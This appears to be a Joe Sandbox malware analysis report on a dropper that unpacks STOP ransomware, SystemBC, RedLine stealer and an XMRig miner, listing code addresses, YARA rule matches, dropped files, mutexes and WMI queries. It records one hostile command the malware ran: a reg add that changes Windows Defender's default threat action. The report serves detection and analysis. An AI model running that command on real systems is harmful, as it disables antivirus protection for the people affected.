Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_02DB3C79	14_2_02DB3C79
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055E3DD8	14_2_055E3DD8
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055E3DC8	14_2_055E3DC8
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055F9670	14_2_055F9670
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055FC688	14_2_055FC688
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055FB118	14_2_055FB118
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055FB108	14_2_055FB108
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055F4045	14_2_055F4045
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055F90C8	14_2_055F90C8
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055F60E8	14_2_055F60E8
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055F90B8	14_2_055F90B8
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055F9F68	14_2_055F9F68
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055F9F15	14_2_055F9F15
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_055F6FB2	14_2_055F6FB2
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_056209F8	14_2_056209F8
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05622398	14_2_05622398
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05622EF0	14_2_05622EF0
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05623940	14_2_05623940
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05623930	14_2_05623930
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_056209E7	14_2_056209E7
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05622DB9	14_2_05622DB9
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05620040	14_2_05620040
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05620006	14_2_05620006
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05626B8E	14_2_05626B8E
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05625668	14_2_05625668
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05A7E430	14_2_05A7E430
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05A7A7B8	14_2_05A7A7B8
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05A70007	14_2_05A70007
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_05A70040	14_2_05A70040
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: 15_2_0040F080	15_2_0040F080
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: 15_2_0041E960	15_2_0041E960
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: 15_2_0040F990	15_2_0040F990
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: 15_2_0044A2C0	15_2_0044A2C0
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: 15_2_0040D2B0	15_2_0040D2B0
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: 15_2_00406B10	15_2_00406B10
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: 15_2_00437580	15_2_00437580
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: 15_2_004056A0	15_2_004056A0
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: 15_2_00433750	15_2_00433750

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\NetVoyager\nv.exe 4CB86D1B9775321A7F8ED4F751E3ECE271402E0BE07070F72E68DF038877DC8E
Source: Joe Sandbox View	Dropped File: C:\ProgramData\DHDAFBFCFHID\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: String function: 02028EC0 appears 57 times
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: String function: 02030160 appears 49 times
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: String function: 004270A0 appears 400 times
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Code function: String function: 00426050 appears 343 times
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: String function: 00413954 appears 177 times

Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915743752.00000134163E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7zS.sfx.exe, vs 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1914949083.0000013416281000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7zS.sfx.exe, vs 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1965969296.0000013417198000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelisasoft.exe$ vs 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1916125541.0000013416203000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7zS.sfx.exe, vs 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915680998.0000013416281000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7zS.sfx.exe, vs 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1908591576.00000134163F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMowdiewart.exe4 vs 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911332413.0000013415DA4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameamado.exeP vs 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1908973123.00000134163FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMowdiewart.exe4 vs 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915570655.0000013416281000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7zS.sfx.exe, vs 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

Source: 10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.983fa38.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 36.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.4dd2eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 36.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.983fa38.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.4dd2eb0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 46.3.etzpikspwykg.exe.9f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 46.3.etzpikspwykg.exe.9f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 46.3.etzpikspwykg.exe.9f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 46.3.etzpikspwykg.exe.9f0000.2.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 46.3.etzpikspwykg.exe.9f0000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 46.3.etzpikspwykg.exe.9f0000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000000A.00000002.2963054220.0000000000647000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000024.00000002.2468755517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: NjdbLPleIutA8FKI_S3fRztd.exe PID: 180, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: armadegon[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: eROo1ugNChgONSxoiS6DxyMi.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66ae9cc050ded_file0308[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NjdbLPleIutA8FKI_S3fRztd.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: armadegon[1].exe.0.dr, i8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: eROo1ugNChgONSxoiS6DxyMi.exe.0.dr, i8.cs	Cryptographic APIs: 'CreateDecryptor'

Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2399415456.00000000078E8000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: MSB4098: MSBuild is invoking VCBuild to build this project. Project-to-project references between VC++ projects (.VCPROJ) and C#/VB/VJ# projects (.CSPROJ, .VBPROJ, .VJSPROJ) are not supported by the command-line build systems when building stand-alone VC++ projects. Projects that contain such project-to-project references will fail to build. Please build the solution file containing this project instead.
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2399415456.00000000078E8000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: MSB4126: The specified solution configuration "{0}" is invalid. Please specify a valid solution configuration using the Configuration and Platform properties (e.g. MSBuild.exe Solution.sln /p:Configuration=Debug /p:Platform="Any CPU") or leave those properties blank to use the default solution configuration.
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2399415456.00000000078E8000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: yMSB4051: Project {0} is referencing a project with GUID {1}, but a project with this GUID was not found in the .SLN file.

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.mine.winEXE@99/55@30/25

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

Code function: 10_2_006477C6 CreateToolhelp32Snapshot,Module32First,

10_2_006477C6

Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe

File created: C:\Program Files (x86)\NetVoyager

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

File created: C:\Users\user\Documents\piratemamm

Jump to behavior

Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_03
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Mutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_14
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2488:120:WilError_03

Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe

File created: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp

Jump to behavior

Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

File read: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
